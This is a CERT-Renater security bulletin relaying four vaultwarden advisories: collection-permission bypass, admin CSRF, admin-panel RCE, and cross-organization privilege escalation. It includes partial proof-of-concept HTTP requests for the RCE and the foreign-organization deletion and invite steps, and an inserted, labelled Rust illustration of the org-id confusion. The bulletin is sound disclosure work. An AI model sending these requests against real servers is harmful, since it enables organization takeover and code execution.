=====================================================================
CERT-Renater Note d'Information No. 2026/VULN185
_____________________________________________________________________
DATE : 18/02/2026
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running vaultwarden versions prior to 1.35.3.
=====================================================================

https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h265-g7rm-h337
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-f7r5-w49x-gxm3
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h6cc-rc6q-23j4
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-j4h8-vch3-f797
_____________________________________________________________________

Full Cipher Enumeration Ignoring Organization Collection Permissions
Severity: Moderate
dani-garcia published GHSA-h265-g7rm-h337 on Feb 11, 2026
Package: vaultwarden
Affected versions: <= 1.35.2
Patched versions: 1.35.3

Description

A regular organization member can retrieve all ciphers within an organization, regardless of collection permissions. The endpoint /ciphers/organization-details is accessible to any organization member and internally uses Cipher::find_by_org to retrieve all ciphers. These ciphers are returned with CipherSyncType::Organization without enforcing collection-level access control.

Attack Preconditions

- The attacker is a member of the target organization (User, Manager, Admin, or Owner).
- The organization contains one or more collections to which the attacker does not have access.

Attack Scenario

- The attacker (a regular organization member) joins the organization.
- The attacker calls /ciphers/organization-details for the organization, including collections they do not have permission to access.
- The response contains all ciphers in the organization, ignoring collection restrictions, allowing the attacker to obtain other members' data (encrypted cipher data, keys, and attachment metadata).

Potential Impact

Collection-based access separation within the organization is bypassed, significantly reducing data confidentiality. Access to encrypted cipher data, keys, and attachment metadata may directly lead to data disclosure if client-side decryption is possible.

Severity: Moderate (6.5 / 10)
CVSS v3 base metrics:
  Attack vector: Network
  Attack complexity: Low
  Privileges required: Low
  User interaction: None
  Scope: Unchanged
  Confidentiality: High
  Integrity: None
  Availability: None
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-26012
Weaknesses: CWE-863
Credits:
  @odgrso (odgrso) - Reporter
  @BlackDex (BlackDex) - Remediation developer
_____________________________________________________________________

Getting access to the Admin Panel via CSRF
Severity: High
dani-garcia published GHSA-f7r5-w49x-gxm3 on Jan 25, 2025
Package: vaultwarden/server (Docker Hub)
Affected versions: <= 1.32.7
Patched versions: 1.33.0

Description

Summary

An attacker can create a malicious HTML page that sends an HTTP request to the vaultwarden admin page to make a change. The HTTP server does not verify the Content-Type header. This requires the DISABLE_ADMIN_TOKEN option to be enabled, as the authentication cookie will not be sent across site boundaries.

PoC

The following HTML code will change the PIN after the victim visits the page:
Severity: High (7.1 / 10)
CVSS v3 base metrics:
  Attack vector: Network
  Attack complexity: Low
  Privileges required: None
  User interaction: Required
  Scope: Unchanged
  Confidentiality: Low
  Integrity: High
  Availability: None
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
CVE ID: No known CVE
Weaknesses: CWE-352
Credits:
  @ElizarBatin (ElizarBatin) - Reporter
  @BlackDex (BlackDex) - Remediation developer
  @dani-garcia (dani-garcia) - Remediation reviewer
_____________________________________________________________________

RCE in the admin panel
Severity: High
dani-garcia published GHSA-h6cc-rc6q-23j4 on Jan 25, 2025
Package: vaultwarden/server (Docker Hub)
Affected versions: <= 1.32.7
Patched versions: 1.33.0

Description

Summary

An attacker with authenticated access to the vaultwarden admin panel can execute arbitrary code on the system.

PoC

Specify the settings as shown in the image.

Then set the read-only option "Icon cache folder" by sending a POST /admin/config request manually:

  POST /admin/config HTTP/1.1
  Host: 127.0.0.1:8001
  Content-Type: application/json
  Cookie: VW_ADMIN=

  { ... "icon_cache_folder":"/@icon" }

Execute the following command to craft the payload:

After that, serve an image on a remote server with the name apple-touch-icon.png or favicon.ico. Download it on the vaultwarden host with a GET /icons/site.com/icon.png request. We can see the @icon directory and the site.com.png file on the vaultwarden host.
Finally, make an HTTP request to execute the code:

  POST /admin/test/smtp HTTP/1.1
  Host: 127.0.0.1:8001
  Cookie: VW_ADMIN=

  {"email":"test@test.com"}

Severity: High (7.2 / 10)
CVSS v3 base metrics:
  Attack vector: Network
  Attack complexity: Low
  Privileges required: High
  User interaction: None
  Scope: Unchanged
  Confidentiality: High
  Integrity: High
  Availability: High
  Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-24364
Weaknesses: No CWEs
Credits:
  @ElizarBatin (ElizarBatin) - Reporter
  @BlackDex (BlackDex) - Remediation developer
  @dani-garcia (dani-garcia) - Remediation reviewer
_____________________________________________________________________

Escalation of privilege via variable confusion in OrgHeaders trait
Severity: High
dani-garcia published GHSA-j4h8-vch3-f797 on Jan 25, 2025
Package: vaultwarden/server (Docker Hub)
Affected versions: <= 1.32.7
Patched versions: 1.33.0

Description

Summary

An attacker can obtain owner rights in another organization. To attack, the hacker must know the ID of the victim organization (in a real case the user can be a member of that organization as an unprivileged user) and be the owner/admin of another organization (by default you can create your own organization).

Details

The vulnerable part of the code is located in src/auth.rs in the OrgHeaders trait. The server finds url_org_id, then gets the membership and the type of membership by this variable. Let's review how the server gets url_org_id.

Here we can see two if conditions. The server tries to get the organization UUID from the path parameter and then the same from the GET query. If we specify both the GET query and the path parameter, the value from the GET query will overwrite the value from the path parameter. We can also see that most endpoints in src/api/core/organizations.rs get the organization UUID from the path parameter and do not use the organizationId GET query value. Thus we can interact with the first organization having the rights of the second one.
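The following is an added example, not vaultwarden's own code or its actual patch: it models the variable confusion described above with two constructed resolver functions, the vulnerable pattern in which the query parameter is read second and silently overwrites the path parameter, and a hardened pattern in which the path parameter is authoritative and a disagreeing organizationId query value is rejected. The function names, error type and sample ids are all assumptions made for the illustration.

```rust
// Added illustration, not vaultwarden's code: models the variable confusion
// described in GHSA-j4h8-vch3-f797, where an organization id can arrive both
// as a path parameter and as an `organizationId` query parameter.

#[derive(Debug, PartialEq)]
pub enum OrgIdError {
    Missing,
    Mismatch { path: String, query: String },
}

/// Vulnerable pattern (constructed, mirrors the two `if` conditions the
/// advisory describes): the query value is read second and silently
/// overwrites the path value, so membership is checked against the query
/// organization while the endpoint later acts on the path organization.
pub fn resolve_org_id_vulnerable(path: Option<&str>, query: Option<&str>) -> Result<String, OrgIdError> {
    let mut url_org_id: Option<String> = None;
    if let Some(p) = path {
        url_org_id = Some(p.to_string());
    }
    if let Some(q) = query {
        url_org_id = Some(q.to_string());
    }
    url_org_id.ok_or(OrgIdError::Missing)
}

/// Hardened pattern (a proposed fix shape, not the project's actual patch):
/// the path parameter is authoritative, the query parameter is only a
/// fallback when no path parameter exists, and any disagreement between the
/// two is rejected instead of being resolved in the caller's favour.
pub fn resolve_org_id_hardened(path: Option<&str>, query: Option<&str>) -> Result<String, OrgIdError> {
    match (path, query) {
        (Some(p), Some(q)) if p != q => Err(OrgIdError::Mismatch {
            path: p.to_string(),
            query: q.to_string(),
        }),
        (Some(p), _) => Ok(p.to_string()),
        (None, Some(q)) => Ok(q.to_string()),
        (None, None) => Err(OrgIdError::Missing),
    }
}

fn main() {
    // Constructed placeholder ids, not real organization UUIDs.
    let path_org = "org-path-0001";
    let query_org = "org-query-0002";
    println!("vulnerable: {:?}", resolve_org_id_vulnerable(Some(path_org), Some(query_org)));
    println!("hardened:   {:?}", resolve_org_id_hardened(Some(path_org), Some(query_org)));
}
```

With both parameters present and different, the vulnerable resolver returns the query organization (the one the caller is authorized in) while the hardened resolver returns a Mismatch error, which is the condition a handler should reject before any membership lookup.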
PoC

Foreign organization deletion:

  DELETE /api/organizations/?organizationId=

Where UUID1 is the foreign organization and UUID2 is the organization where the attacker has owner/admin rights.

Foreign organization privilege escalation. Inviting a user into the victim organization:

  POST /api/organizations//users/invite?organizationId=

  {"emails":["attacker@site.com"],"collections":[],"accessAll":true,"permissions":{"response":null},"type":0,"groups":[],"accessSecretsManager":false}

Where UUID1 is the foreign organization and UUID2 is the organization where the attacker has owner/admin rights.

Confirm user enrollment in the victim organization:

  POST /api/organizations//users//confirm?organizationId=

  {"key":}

Where UUID1 is the foreign organization, UUID2 is the organization where the attacker has owner/admin rights, and ATTACKER_USER_UUID is the UUID of the attacker.

Severity: High (8.1 / 10)
CVSS v3 base metrics:
  Attack vector: Network
  Attack complexity: Low
  Privileges required: Low
  User interaction: None
  Scope: Unchanged
  Confidentiality: High
  Integrity: High
  Availability: None
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
CVE ID: CVE-2025-24365
Weaknesses: CWE-284
Credits:
  @ElizarBatin (ElizarBatin) - Reporter
  @BlackDex (BlackDex) - Remediation developer
  @dani-garcia (dani-garcia) - Remediation reviewer

=========================================================
+ CERT-RENATER        | tel : 01-53-94-20-44             +
+ 23/25 Rue Daviel    | fax : 01-53-94-20-41             +
+ 75013 Paris         | email : cert@support.renater.fr  +
=========================================================